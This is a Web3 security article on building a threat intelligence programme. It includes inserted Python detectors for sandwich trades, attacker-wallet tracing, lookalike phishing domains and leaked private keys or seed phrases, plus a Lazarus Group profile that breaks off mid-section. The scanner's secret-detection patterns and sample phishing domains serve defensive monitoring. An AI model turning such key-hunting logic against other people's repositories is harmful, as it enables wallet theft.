Get Secured
Operational Security, 18 June 2026

Blockchain Threat Intelligence: Building a CTI Programme for Web3 Firms

The Intelligence Gap in Web3 Security

The dominant security posture across the crypto industry is reactive. An exploit occurs, funds drain, and a post-mortem appears days later attributing the loss to a reentrancy bug, a compromised private key, or a social engineering attack on a developer. The post-mortem is thorough. The response is swift. The funds are gone. This cycle repeats with remarkable consistency across protocols, exchanges, and infrastructure providers at every stage of maturity.

The problem is not a lack of security spending. Many Web3 firms invest substantially in smart contract audits, penetration testing, and bug bounty programmes. The problem is a structural absence of proactive threat intelligence: the organisational capability to collect, analyse, and act on information about threats before those threats materialise into incidents. In traditional financial services and defence sectors, this capability is called a cyber threat intelligence (CTI) programme, and it is considered a foundational element of any serious security function. In Web3, it remains rare.

The consequences of this gap are measurable. According to SlowMist's 2025 annual review, the majority of losses in the sector stem not from novel zero-day vulnerabilities but from well-documented attacker behaviours: phishing, key theft, supply chain poisoning, and social engineering. These are the exact categories of threat that a functioning CTI programme is designed to detect and disrupt in advance. The attackers, including state-sponsored groups operating with the resources and patience of a professional intelligence service, conduct extensive reconnaissance before any on-chain activity becomes visible. Firms that lack a CTI capability do not see them coming.

This article sets out how to build a structured blockchain threat intelligence programme. It is written for the security director, CISO, or founder who recognises the gap and wants a clear operational framework for closing it.

Defining CTI in the Web3 Context

Cyber threat intelligence is the collection, analysis, and operationalisation of information about the threats facing an organisation. In the Web3 context, those threats span a uniquely broad attack surface: smart contract logic, private key infrastructure, developer workstations, cloud environments, social media accounts used for community management, exchange custody relationships, and the human operators who sit across all of these. CTI for Web3 must address all of these layers simultaneously.

The defining characteristic of mature CTI is the distinction between raw data and finished intelligence. Raw data is a list of malicious wallet addresses. Finished intelligence is an assessment of which threat actor controls those wallets, what their historical targeting pattern looks like, what attack phase they are likely in, and what your organisation should do differently in the next seventy-two hours as a result. The difference between data and intelligence is analysis, context, and a clear connection to a decision that needs to be made.

Web3 CTI adds an additional dimension absent from traditional enterprise security: the blockchain ledger itself is a publicly queryable source of threat data. On-chain activity leaves a permanent, transparent record that a skilled analyst can use to reconstruct attacker behaviour, trace fund flows, identify infrastructure reuse, and predict next moves. No equivalent capability exists in most other sectors. Combined with conventional off-chain intelligence sources, this creates a uniquely powerful analytical environment for security teams willing to build the capability.

"Most crypto losses are not caused by unknown vulnerabilities. They are caused by known attacker behaviour that nobody was watching for. A CTI programme changes that equation."

The Three Tiers of Threat Intelligence

A well-structured CTI programme produces intelligence at three distinct tiers, each serving a different audience and time horizon.

Strategic Intelligence

Strategic intelligence is produced for board-level and executive audiences. It addresses the macro threat landscape: which nation-state actors are actively targeting crypto infrastructure, what sectors of the industry are experiencing elevated attack rates, and how the risk profile of the organisation is changing over time. Strategic intelligence informs resource allocation, insurance positioning, regulatory reporting, and acquisition due diligence. It is typically produced monthly or quarterly, written in plain language, and free of technical jargon. Its primary audience is leadership teams who are not security specialists but whose decisions determine the organisation's overall risk exposure.

For a Web3 firm, strategic intelligence might include a quarterly briefing on DPRK-linked activity targeting crypto exchanges, an assessment of the regulatory risk associated with particular threat actor groups, or an analysis of how recent large-scale exploits affect the firm's own threat surface through shared dependencies or partner relationships.

Operational Intelligence

Operational intelligence is produced for security management and incident response teams. It provides situational awareness about active campaigns, ongoing threat actor operations, and the contextual information teams need to prioritise their response activities. Operational intelligence typically has a time horizon of days to weeks and answers questions such as: is there an active phishing campaign targeting crypto firms using a particular lure? Are there indicators suggesting a threat actor has compromised a peer organisation and may pivot to ours? What does the current targeting pattern of a specific adversary group suggest about their near-term intentions?

This tier bridges the gap between the board-level risk picture and the technical indicators used by analysts and detection engineers. It gives the security team the contextual awareness to make better triage decisions and pre-position their defences appropriately.

Tactical Intelligence

Tactical intelligence is the most granular tier. It consists of technical indicators of compromise (IoCs): specific IP addresses, wallet addresses, domain names, file hashes, and behavioural signatures associated with known threat actors. Tactical intelligence feeds directly into detection and monitoring tools, blocklists, and alert rules. It has a short shelf life, because threat actors rotate infrastructure frequently, but it provides the raw material for real-time detection.

For Web3, tactical intelligence includes on-chain indicators such as wallet addresses associated with known theft operations, contract addresses used in past exploits, and transaction patterns characteristic of specific attack methods. It also includes off-chain indicators: phishing domains registered to mimic your brand, malicious npm packages designed to target your developer team, and infrastructure overlaps linking different attack campaigns to the same threat actor.

On-Chain Threat Intelligence Sources

The blockchain ledger is the most distinctive intelligence source available to Web3 security teams. Every transaction is public, permanent, and queryable. Skilled analysts can extract a remarkable amount of adversary insight from on-chain data alone.

Blockchain Analytics Platforms

Platforms such as Chainalysis and Merkle Science provide structured intelligence about wallet attribution, fund flows, and transaction risk. These tools maintain large databases of address labels, linking on-chain addresses to known entities including exchanges, mixers, sanctioned entities, and threat actor clusters. For a CTI programme, they serve two primary functions: pre-transaction screening of counterparties to detect exposure to illicit funds, and post-incident tracing to follow stolen funds and identify the infrastructure used by attackers.

Elliptic, another leading provider, combines on-chain and off-chain data to link blockchain activity to real-world entities. Its threat intelligence offering has grown to encompass over thirteen years of ground-truth evidence connecting on-chain addresses to documented threat actors and criminal organisations. For a mid-size Web3 firm, a subscription to one of these platforms provides immediate uplift to the operational and tactical tiers of the intelligence programme.

On-Chain Anomaly Detection

Beyond static address databases, on-chain anomaly detection platforms monitor live blockchain activity for behavioural signatures associated with attacks in progress. Platforms such as Hexagate use machine learning models trained on historical exploit data to identify attack patterns in pending transactions before they finalise on-chain. This pre-execution visibility provides a critical window for automated response, such as pausing a vulnerable contract or alerting the security team in time to act.

SlowMist's MistEye platform offers a complementary approach, providing a continuously updated threat intelligence database with over 27,000 categorised threats ranging from critical to medium severity, along with a live feed of new discoveries and a comprehensive archive of 2,006 documented hack events totalling approximately $36.9 billion in cumulative losses. The depth of historical data makes it a valuable resource for pattern analysis and threat actor profiling.

Mempool Monitoring

The mempool, the pool of pending but unconfirmed transactions on Ethereum and other EVM-compatible networks, is a real-time intelligence source for detecting attack activity before it lands on-chain. Front-running and sandwich attacks leave distinctive signatures: a transaction priced to land immediately ahead of a target, and bundles structured to bracket a target swap with a buy before it and a sell after it in the same pool. One caveat matters in practice: a large share of MEV bundles is now submitted to block builders privately rather than broadcast to the public mempool, so a completed sandwich is often only observable once the block is published. Ordering analysis of confirmed blocks should therefore complement live mempool monitoring. MEV extraction costs users of DeFi protocols hundreds of millions of dollars annually. A security team monitoring for known attack signatures can detect ongoing exploitation activity, trigger automated circuit breakers, or alert protocol teams in time to mitigate damage.

Mempool monitoring also provides advance warning of state-change attacks targeting specific contracts. When an attacker pre-computes an exploit and submits a transaction to the mempool, the window between submission and block inclusion can range from seconds to minutes depending on gas pricing. Systems that monitor mempool activity against known vulnerable contract signatures can detect these in-flight attacks and, where smart contract architecture permits, respond before finalisation.
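The bracket pattern described above, as an added example that is not part of the original article: a detector that walks an ordered list of swaps (from a mempool snapshot or a published block) and reports an attacker buy, one or more victim buys in the same pool from other senders, and the attacker's closing sell. The `Swap` record, the pool labels and the sample transactions are constructed for the example; a real feed would populate them from decoded router calls or pool `Swap` events.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Swap:
    """One decoded swap. Field names are assumptions for this example."""
    tx_hash: str
    sender: str
    pool: str            # pool the swap routes through
    direction: str       # "buy" or "sell" of the pool's base token
    gas_price_gwei: float
    position: int        # ordering index in the block or mempool snapshot


def find_sandwiches(swaps: List[Swap], max_victims: int = 3) -> List[Dict]:
    """Return every bracket (attacker buy, victim buys, attacker sell) found.

    For each buy, look ahead within the same pool: buys by other senders are
    collected as victims; the first later swap by the original sender closes
    the bracket (counted only if it is a sell and at least one victim sits in
    between); an opposite-direction swap by a third party breaks the pattern.
    Swaps in other pools are ignored.
    """
    ordered = sorted(swaps, key=lambda s: s.position)
    found: List[Dict] = []
    for i, front in enumerate(ordered):
        if front.direction != "buy":
            continue
        victims: List[Swap] = []
        for back in ordered[i + 1:]:
            if back.pool != front.pool:
                continue
            if back.sender == front.sender:
                if back.direction == "sell" and victims:
                    found.append({
                        "attacker": front.sender,
                        "pool": front.pool,
                        "front_run": front.tx_hash,
                        "back_run": back.tx_hash,
                        "victims": [v.tx_hash for v in victims],
                        # Public-mempool sandwiches outbid the victim on gas; bundles
                        # sent to builders privately need not, so this is a signal, not a rule.
                        "gas_outbid": all(front.gas_price_gwei > v.gas_price_gwei for v in victims),
                    })
                break
            if back.direction != front.direction or len(victims) >= max_victims:
                break
            victims.append(back)
    return found


# Constructed sample: one sandwich on WETH/USDC, one legitimate round trip on WBTC/USDC.
SAMPLE_BLOCK = [
    Swap("0xa1", "0xattacker", "WETH/USDC", "buy", 52.0, 0),
    Swap("0xv1", "0xvictim", "WETH/USDC", "buy", 31.0, 1),
    Swap("0xa2", "0xattacker", "WETH/USDC", "sell", 52.0, 2),
    Swap("0xb1", "0xbob", "WBTC/USDC", "buy", 30.0, 3),
    Swap("0xb2", "0xbob", "WBTC/USDC", "sell", 30.0, 4),
    Swap("0xc1", "0xcarol", "WETH/USDC", "sell", 28.0, 5),
]

if __name__ == "__main__":
    for hit in find_sandwiches(SAMPLE_BLOCK):
        print(hit)
```

Bob's buy and sell on WBTC/USDC are deliberately not reported: a round trip with nobody in between is ordinary trading, and a detector that flags it will bury the team in noise.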

Known Threat Actor Wallet Monitoring

Tracking the on-chain movements of known threat actor wallets is one of the highest-signal activities available to a CTI team. Following a major exploit, blockchain analysts typically identify the attacker's primary wallet address within hours. These addresses are then published through community intelligence sources and, for significant incidents involving sanctions exposure, added to OFAC and equivalent lists. A CTI programme that maintains a watchlist of confirmed threat actor addresses and monitors them for activity can detect patterns including infrastructure staging prior to a new attack, laundering activity indicating an imminent attempt to cash out, and address clustering that reveals new wallets belonging to the same actor.

Lazarus Group wallets, for example, exhibit distinctive on-chain behaviour patterns including multi-hop routing through mixers, bridge hopping across chains to fragment tracking, and holding periods that follow consistent timing profiles. Analysts who understand these patterns can identify likely Lazarus-affiliated activity with meaningful confidence even when the specific wallets are new.
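The watchlist expansion and cash-out detection described in the two paragraphs above, as an added example that is not part of the original article. Seeds are confirmed attacker addresses; the code follows outbound transfers hop by hop, tags a receiving address only when most of its inbound value is tainted (so a busy exchange deposit address that happens to receive one attacker transfer is not swallowed), never tags known service addresses, and then alerts on any tagged address sending into a mixer or exchange. The `Transfer` record, the service list and the transfers are constructed; the short labels stand in for real 20-byte addresses.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class Transfer:
    tx_hash: str
    ts: int            # unix seconds
    src: str
    dst: str
    value_eth: float


def norm(addr: str) -> str:
    # Lower-case so EIP-55 mixed-case and lower-case forms of one address match.
    # Validating the EIP-55 checksum itself needs keccak-256, which the stdlib lacks.
    return addr.strip().lower()


def expand_watchlist(seeds: Set[str], transfers: List[Transfer], services: Set[str],
                     max_hops: int = 2, min_taint_share: float = 0.5) -> Dict[str, Dict]:
    """Grow a watchlist outward from confirmed attacker addresses.

    At each hop an address is added if at least `min_taint_share` of its total
    inbound value came from addresses tagged in the previous hop. Known service
    addresses (exchanges, mixers, bridges) are destinations, not attacker wallets,
    so they are never tagged. Confidence halves per hop.
    """
    tagged = {norm(a): {"hops": 0, "confidence": 1.0, "via": None} for a in seeds}
    service_set = {norm(a) for a in services}
    inbound: Dict[str, float] = defaultdict(float)
    for t in transfers:
        inbound[norm(t.dst)] += t.value_eth
    frontier = set(tagged)
    for hop in range(1, max_hops + 1):
        tainted_in: Dict[str, float] = defaultdict(float)
        first_tx: Dict[str, str] = {}
        for t in sorted(transfers, key=lambda t: t.ts):
            s, d = norm(t.src), norm(t.dst)
            if s in frontier and d not in tagged and d not in service_set:
                tainted_in[d] += t.value_eth
                first_tx.setdefault(d, t.tx_hash)
        new = {d: {"hops": hop, "confidence": 0.5 ** hop, "via": first_tx[d]}
               for d, v in tainted_in.items() if v / inbound[d] >= min_taint_share}
        if not new:
            break
        tagged.update(new)
        frontier = set(new)
    return tagged


def detect_cashouts(tagged: Dict[str, Dict], transfers: List[Transfer],
                    services: Set[str], min_confidence: float = 0.25) -> List[Dict]:
    """Alert on transfers from a tagged address into a known service address."""
    service_set = {norm(a) for a in services}
    alerts = []
    for t in sorted(transfers, key=lambda t: t.ts):
        s, d = norm(t.src), norm(t.dst)
        if s in tagged and d in service_set and tagged[s]["confidence"] >= min_confidence:
            alerts.append({"tx": t.tx_hash, "from": s, "to_service": d,
                           "value_eth": t.value_eth, "confidence": tagged[s]["confidence"]})
    return alerts


# Constructed sample (labels stand in for real addresses).
SERVICES = {"0xmixer", "0xexchangedeposit"}
SAMPLE_TRANSFERS = [
    Transfer("0x01", 1000, "0xAtTaCkEr", "0xhop1a", 100.0),   # mixed case on purpose
    Transfer("0x02", 1010, "0xattacker", "0xhop1b", 50.0),
    Transfer("0x03", 1020, "0xmerchant", "0xhop1b", 200.0),   # hop1b is mostly clean money
    Transfer("0x04", 1100, "0xhop1a", "0xhop2", 100.0),
    Transfer("0x05", 1200, "0xhop2", "0xmixer", 99.0),        # cash-out attempt
    Transfer("0x06", 1300, "0xalice", "0xexchangedeposit", 10.0),
]

if __name__ == "__main__":
    watch = expand_watchlist({"0xAtTaCkEr"}, SAMPLE_TRANSFERS, SERVICES)
    print(watch)
    print(detect_cashouts(watch, SAMPLE_TRANSFERS, SERVICES))
```

The taint-share threshold is the part worth tuning against your own data: set it too low and the watchlist grows to include every counterparty the attacker ever paid; set it too high and a wallet that was topped up with a little clean money to muddy the trail slips through.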

Off-Chain Threat Intelligence Sources

On-chain data captures what has already happened, or is in the process of happening. Off-chain intelligence sources capture the planning, recruitment, and infrastructure-building that precede any on-chain action. For a comprehensive CTI programme, off-chain sources are often more valuable for early warning.

Dark Web and Threat Actor Forum Monitoring

Threat actors involved in crypto theft communicate through a range of channels including dark web forums, private Telegram groups, and Discord servers dedicated to exploit discussion, credential trading, and attack coordination. Monitoring these channels provides advance notice of campaigns being planned, credentials being sold that may include those of your staff, and new attack tools being developed or sold as services.

Dark web monitoring for crypto firms focuses particularly on: credential marketplaces where stolen login data is sold, including exchange accounts and internal tool credentials; forum discussions referencing specific protocols or teams by name; and listings from initial access brokers, who sell compromised access to internal systems to other actors before a full attack is executed.

Telegram and Discord Channel Intelligence

A significant proportion of Web3 threat actor communication occurs on Telegram. Private channels and groups are used for coordinating phishing campaigns, sharing exploit toolkits, recruiting participants for rug pull schemes, and organising social engineering operations against specific targets. Public channels operated by threat actors sometimes provide inadvertent intelligence through the artefacts they share. Monitoring relevant Telegram channels, including those operated by known scam networks, provides a continuous stream of low-to-medium confidence intelligence that, when combined with other sources, can provide meaningful advance warning of campaigns in progress.

Social Engineering Campaign Monitoring

The majority of successful attacks against crypto firms in recent years have involved a social engineering component. Attackers research targets on LinkedIn, GitHub, and X (formerly Twitter), identify employees with high-value access, and construct highly personalised approaches. Monitoring for social engineering indicators includes: tracking new LinkedIn profiles that approach your senior staff; identifying job postings on external platforms advertising roles that do not exist within your organisation (a Lazarus Group tactic used to bait developers); and watching for accounts impersonating your leadership or brand in direct message campaigns targeting staff or community members.

Phishing Domain Tracking

Phishing domain monitoring is one of the highest-return off-chain intelligence activities for any crypto firm. Attackers regularly register domains that closely mimic a target's legitimate domain, using typosquatting, homoglyph substitution, or subdomain manipulation to create convincing lures. Many of these domains are registered days or weeks before a campaign launches, providing an early warning window if the firm is actively monitoring new domain registrations for brand similarity.

Certificate transparency logs provide a publicly accessible, near-real-time feed of new TLS certificates being issued across the internet. Parsing certificate transparency logs for domains resembling your brand, your partners' brands, and your product names is a low-cost, high-signal intelligence activity that can surface phishing infrastructure before it is operationalised against your users or staff.
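The certificate transparency check described above, as an added example that is not part of the original article: it takes log entries in the shape of crt.sh's JSON output (an assumption; any CT client that yields hostnames will do), decodes punycode labels, maps common confusable characters back to ASCII, and classifies each name as a homoglyph, a typosquat (using optimal string alignment distance so a swapped letter pair counts as one edit), a brand keyword, a TLD variant, or a subdomain impersonation. The brand, the legitimate domain and the entries are constructed; the registrable-label split is naive and assumes a one-label public suffix.

```python
from typing import Dict, Iterable, List, Optional, Tuple

# Single-character confusables (ASCII digits and Cyrillic look-alikes); extend as needed.
HOMOGLYPHS = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s", "7": "t",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0456": "i",
})


def decode_idna(host: str) -> str:
    """Turn punycode labels (xn--...) back into Unicode so confusables can be mapped."""
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host


def squash(label: str) -> str:
    """Map confusables to their ASCII targets and drop hyphens for comparison."""
    return (label.translate(HOMOGLYPHS)
            .replace("rn", "m").replace("vv", "w").replace("-", ""))


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: edits plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(hostname: str, brands: Iterable[str], legit_domains: Iterable[str],
             max_distance: int = 1) -> Optional[Tuple[str, str]]:
    """Return (verdict, brand) for a lookalike, ("legitimate", host), or None."""
    host = decode_idna(hostname.lower().lstrip("*."))
    if any(host == d or host.endswith("." + d) for d in legit_domains):
        return ("legitimate", host)
    labels = host.split(".")
    if len(labels) < 2:
        return None
    registrable = labels[-2]      # naive: assumes a one-label public suffix
    sub_labels = labels[:-2]
    for brand in brands:
        b = brand.lower()
        reg = squash(registrable)
        if registrable == b:
            return ("tld-variant", b)
        if reg == b:
            return ("homoglyph", b)
        if osa_distance(reg, b) <= max_distance:
            return ("typosquat", b)
        if b in reg:
            return ("brand-keyword", b)
        if any(b in squash(l) for l in sub_labels):
            return ("subdomain-impersonation", b)
    return None


def scan_ct_entries(entries: List[Dict], brands, legit_domains) -> List[Tuple[str, str, str]]:
    """Entries carry newline-separated names in `name_value` (crt.sh shape, assumed)."""
    seen, hits = set(), []
    for entry in entries:
        for name in entry.get("name_value", "").split("\n"):
            name = name.strip().lower()
            if not name or name in seen:
                continue
            seen.add(name)
            result = classify(name, brands, legit_domains)
            if result and result[0] != "legitimate":
                hits.append((name, result[0], result[1]))
    return hits


# Constructed sample. PUNY is "examplewаllet.net" with a Cyrillic а, as a CT log would carry it.
BRANDS = ["examplewallet"]
LEGIT = ["examplewallet.com"]
PUNY = "examplew\u0430llet.net".encode("idna").decode("ascii")
SAMPLE_ENTRIES = [
    {"name_value": "examplewallet.com\nwww.examplewallet.com"},
    {"name_value": "www.examp1e-wallet.com"},
    {"name_value": "exampelwallet.io"},
    {"name_value": "login.examplewallet.com.secure-verify.net"},
    {"name_value": "examplewallet-support.net"},
    {"name_value": PUNY},
    {"name_value": "mail.unrelated-site.org"},
]

if __name__ == "__main__":
    for hit in scan_ct_entries(SAMPLE_ENTRIES, BRANDS, LEGIT):
        print(hit)
```

A real deployment should replace the naive registrable-label split with the public suffix list, since `examplewallet.co.uk` and `examplewallet.github.io` both break the one-label assumption, and should feed partner and product names into `BRANDS` alongside your own.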

Paste Sites and Code Repository Scanning

Paste sites such as Pastebin and similar platforms are routinely used by attackers to exfiltrate and share stolen data including private keys, seed phrases, API credentials, and database dumps. Monitoring paste sites for references to your organisation name, domain, known wallet addresses, or contract addresses provides early warning of credential theft that has not yet been operationalised.

Code repositories represent an equally critical monitoring target. Developers frequently commit sensitive material to public GitHub repositories: hardcoded private keys, API credentials, internal configuration files, and environment variables containing wallet seed phrases. An automated scanning programme covering public repositories associated with your team and contractors, combined with historical commit scanning for any repositories that were previously private, addresses one of the most consistently exploited intelligence gaps in the industry. SlowMist's 2025 quarterly data identified malicious GitHub repository poisoning as one of the top attack vectors of the year.
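The repository and paste-site scanning described in the two paragraphs above, as an added example that is not part of the original article. Generic secret scanners match any 64-hex string, which also catches transaction hashes, block hashes and digests; this scanner adds the two checks that separate key material from look-alikes: the value must be a usable secp256k1 scalar (strictly between 0 and the group order), and it must have the character entropy of random bytes. Surrounding keywords then raise or suppress confidence. Seed phrases are flagged by word-run shape only, because the BIP-39 word list is not embedded and the checksum is not verified. The sample file is constructed; the hex values in it are not real keys.

```python
import math
import re
from typing import Dict, List

# Order of the secp256k1 group: a usable private key k satisfies 0 < k < N.
SECP256K1_N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141

HEX64 = re.compile(r"(?<![0-9a-fA-F])(?:0x)?([0-9a-fA-F]{64})(?![0-9a-fA-F])")
# 12 to 24 lower-case words of 3-8 letters; BIP-39 checksum is not verified (heuristic only).
WORD_RUN = re.compile(r"\b(?:[a-z]{3,8} ){11,23}[a-z]{3,8}\b")
POSITIVE = ("private", "priv", "secret", "key", "mnemonic", "seed", "deployer", "signer")
NEGATIVE = ("hash", "digest", "txid", "tx_", "block", "merkle", "root", "topic")


def shannon_entropy(s: str) -> float:
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def redact(secret: str) -> str:
    """Never copy the full secret into a finding; a ticket is another place it can leak from."""
    return secret[:6] + "..." + secret[-4:]


def classify_hex(candidate: str, line: str) -> str:
    """Return "high", "medium" or "" for a 64-hex token found on `line`."""
    k = int(candidate, 16)
    if not 0 < k < SECP256K1_N:
        return ""                 # not a usable secp256k1 scalar
    if shannon_entropy(candidate.lower()) < 3.0:
        return ""                 # repetitive filler, not key material
    ctx = line.lower()
    if any(w in ctx for w in NEGATIVE):
        return ""                 # same shape as a key, but the context says hash or tx id
    return "high" if any(w in ctx for w in POSITIVE) else "medium"


def scan_text(text: str) -> List[Dict]:
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        for m in HEX64.finditer(line):
            conf = classify_hex(m.group(1), line)
            if conf:
                findings.append({"line": no, "kind": "private-key", "confidence": conf,
                                 "preview": redact(m.group(1))})
        m = WORD_RUN.search(line)
        if m and len(m.group(0).split()) in (12, 15, 18, 21, 24):
            findings.append({"line": no, "kind": "mnemonic", "confidence": "medium",
                             "preview": redact(m.group(0))})
    return findings


# Constructed sample file; none of these values is a real key.
SAMPLE = """\
# deploy.env (constructed sample; no real keys)
RPC_URL=https://rpc.example.invalid
PRIVATE_KEY=0x1f9e3a7c5b8d2e4f6a0c9b7d3e5f1a2c4b6d8e0f2a4c6e8b1d3f5a7c9e2b4d6f
TX_HASH=0xa7c3e91f0b24d6c8e5f1a3b7d9c2e4f6a8b0c1d3e5f7a9b2c4d6e8f0a1b3c5d7
ZERO=0x0000000000000000000000000000000000000000000000000000000000000000
VALUE=9d1e7b3f5a2c8e0d4f6b1a3c5e7f9b2d4a6c8e0f1b3d5f7a9c2e4b6d8f0a1c3e
MNEMONIC="abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon abandon about"
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE):
        print(f)
```

Run this over every commit in history, not only the current tree: a key removed in a later commit is still retrievable by anyone who clones the repository, and a key that was ever pushed to a public remote should be treated as compromised and rotated regardless of what the scanner reports today.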

Threat Intelligence Feeds Relevant to Web3

A CTI programme does not need to generate all of its own intelligence. Several publicly available and community-maintained feeds provide structured threat data specifically relevant to Web3 security teams.

DeFiHackLabs on GitHub is a community-maintained repository tracking Web3 security incidents with technical detail including proof-of-concept exploit code, attacker wallet addresses, and timeline reconstructions. It is one of the most comprehensive free resources available for mapping attack patterns and maintaining an awareness of which vulnerability classes are actively being exploited in the wild.

Rekt News provides narrative post-mortems of significant DeFi exploits, with consistent coverage of attack mechanics, financial impact, and attacker behaviour. The Rekt database is searchable and provides historical context for understanding how specific vulnerability patterns have evolved over time. Its weekly security brief aggregates the most significant incidents and intelligence items from across the ecosystem.

The SlowMist Hacked database documents over 2,000 blockchain attack events totalling approximately $36.9 billion in losses, with each entry categorised by attack method, protocol type, and financial impact. The database is queryable and provides both historical pattern analysis and near-real-time incident tracking. SlowMist also operates the InMist Threat Intelligence Network, a collaborative feed that aggregates malicious addresses and phishing infrastructure from across the global security community.

For organisations of sufficient scale, Crypto ISAC provides a vetted, members-only threat intelligence sharing environment. In January 2026, Coinbase expanded its integration with Crypto ISAC to provide continuous, automated sharing of high-confidence threat indicators with the member community. Ripple has since contributed DPRK-linked threat intelligence to the same network, including wallet addresses, fraud-linked domains, and identity signals tied to North Korean infiltration schemes. The Crypto ISAC API normalises both Web2 and Web3 threat indicators into a unified format suitable for direct integration with security tooling.

The Security Alliance (SEAL) ISAC offers a free, crypto-native information sharing environment operating on OpenCTI, with early participants including security teams from Chainalysis, the Ethereum Foundation, MetaMask, Polygon, and Uniswap Labs. SEAL-ISAC provides automated threat feeds curated by analysts as well as peer-contributed intelligence from member organisations. For smaller firms unable to afford commercial feed subscriptions, SEAL-ISAC represents a practical entry point into structured intelligence sharing.

Building an Analyst Workflow

Subscribing to threat feeds does not constitute a CTI programme. The defining capability of a mature CTI function is the analyst workflow that transforms raw data into finished, actionable intelligence. Without this workflow, feeds generate noise rather than signal.

Triage

The first step in any analyst workflow is triage: the systematic review of incoming data to determine what is relevant, credible, and time-sensitive. A CTI analyst reviewing daily feed outputs applies a consistent set of questions: does this indicator relate to a threat actor or campaign known to target organisations like ours? Does it involve infrastructure, tactics, or personnel relevant to our environment? Is the confidence level sufficient to act on, or does it require further enrichment before being operationalised?

Effective triage requires documented intelligence requirements: a clear articulation of what your organisation needs intelligence about, prioritised by risk. Without documented requirements, triage becomes a matter of individual analyst judgement, which is inconsistent and difficult to audit.

Enrichment

Raw indicators need context before they can drive decisions. A wallet address flagged as suspicious is more useful when enriched with information about which threat actor cluster it belongs to, when it was first observed, what it has transacted with, and whether it appears in any sanctions databases. A phishing domain is more actionable when linked to the broader infrastructure campaign it belongs to, including other domains registered using the same registrar, hosting provider, or registration pattern.

Enrichment tools for Web3 CTI include blockchain analytics platforms for on-chain context, domain intelligence tools such as PassiveTotal or Shodan for infrastructure analysis, and internal knowledge bases documenting your organisation's own previous exposure to specific threat actors or campaigns.

Production and Dissemination

Finished intelligence products need to reach the right audience in the right format. Tactical IoCs go directly into detection tooling or blocklists with minimal latency. Operational intelligence is packaged as brief written summaries, typically one to two pages, delivered to the security management team on a weekly or as-needed basis. Strategic intelligence is produced monthly or quarterly as a formal written product for leadership review.

The common failure mode is producing intelligence that never reaches a decision-maker. CTI outputs must be integrated into existing security processes, team rituals, and leadership reporting cycles. Intelligence that sits in a threat feed dashboard and is never read provides no value.

Integration with Incident Response

A CTI programme delivers its greatest value when it is tightly integrated with incident response planning. The two functions are mutually reinforcing: intelligence shapes the response runbooks and pre-positions the team for known threats, while incident investigations generate new intelligence about attacker behaviour and infrastructure that enriches the programme's future outputs.

For known threat actors with documented TTPs, the CTI programme enables pre-positioning: defining in advance the detection rules, escalation procedures, and response actions appropriate to that specific adversary. When indicators of Lazarus Group activity are detected in your environment, for example, the team should not be improvising. They should have a pre-written playbook based on the known characteristics of a Lazarus Group intrusion: what persistence mechanisms to look for, what data targets the group typically prioritises, what their typical exfiltration timing looks like, and which response actions are most likely to contain the incident before funds are moved.

This pre-positioning requirement drives one of the key analytical tasks of a CTI programme: producing detailed threat actor profiles for the adversaries most likely to target your organisation. For Web3 firms of any meaningful size or visibility, that list almost certainly includes Lazarus Group.

Building a capable security operations centre requires this intelligence integration to function at full effectiveness. Detection rules without adversary context are blunt instruments. Runbooks without threat actor profiles are generic to the point of uselessness. The CTI programme provides the adversary-specific context that turns a competent security team into a genuinely threat-informed one.

Lazarus Group: Threat Profile and TTPs

Lazarus Group, the North Korean state-sponsored threat actor assessed to be operating under the auspices of the Reconnaissance General Bureau, has caused more documented financial damage to the crypto sector than any other single adversary. Conservative estimates attribute at least $3 billion in crypto theft to Lazarus-affiliated operations between 2017 and 2025, with 2025 alone contributing major incidents including the $1.4 billion Bybit breach. For any Web3 firm operating at scale, building a detailed Lazarus Group threat profile is not optional.

Initial Access Techniques

Lazarus Group's most consistently observed initial access technique against crypto firms is spear phishing with high-personalisation lures. These campaigns are not generic phishing emails. They reference the target's specific role, current projects, professional connections, and interests. The group invests significant effort in open-source reconnaissance on LinkedIn, GitHub, and X before approaching a target, constructing lures that appear credible to even security-aware recipients.

The fake job offer campaign, sometimes referred to as "Operation Dream Job," is a signature Lazarus technique. Threat actors pose as recruiters from credible technology and financial firms, approaching developers, DevOps engineers, and security staff with attractive employment offers. The recruitment process is conducted over multiple interactions to build rapport and credibility, before eventually delivering a malware payload disguised as a coding assessment, technical interview document, or onboarding package.

In 2025, Lazarus Group expanded their supply chain attack surface aggressively, publishing malicious packages to the npm and PyPI ecosystems. These packages, designed to mimic legitimate developer utilities, executed malware that scanned for and exfiltrated MetaMask wallet data, environment variables, and private key material. ORKL's whitepaper documenting this campaign identified over 234 unique malicious packages with a potential victim pool exceeding 36,000 developers. This represents a fundamental evolution: rather than targeting a firm directly, the group poisons the upstream dependencies that developers across hundreds of firms consume simultaneously.

Persistence and Lateral Movement

Once initial access is achieved, Lazarus Group typically establishes persistent access through backdoored tooling, scheduled tasks, or modified legitimate binaries. They exhibit a high tolerance for long dwell time, sometimes remaining undetected inside a network for weeks or months while conducting internal reconnaissance and mapping the full scope of accessible keys and custody infrastructure. This patience is a deliberate operational choice: the group prioritises a complete understanding of the target's key management architecture before triggering any visible theft event.

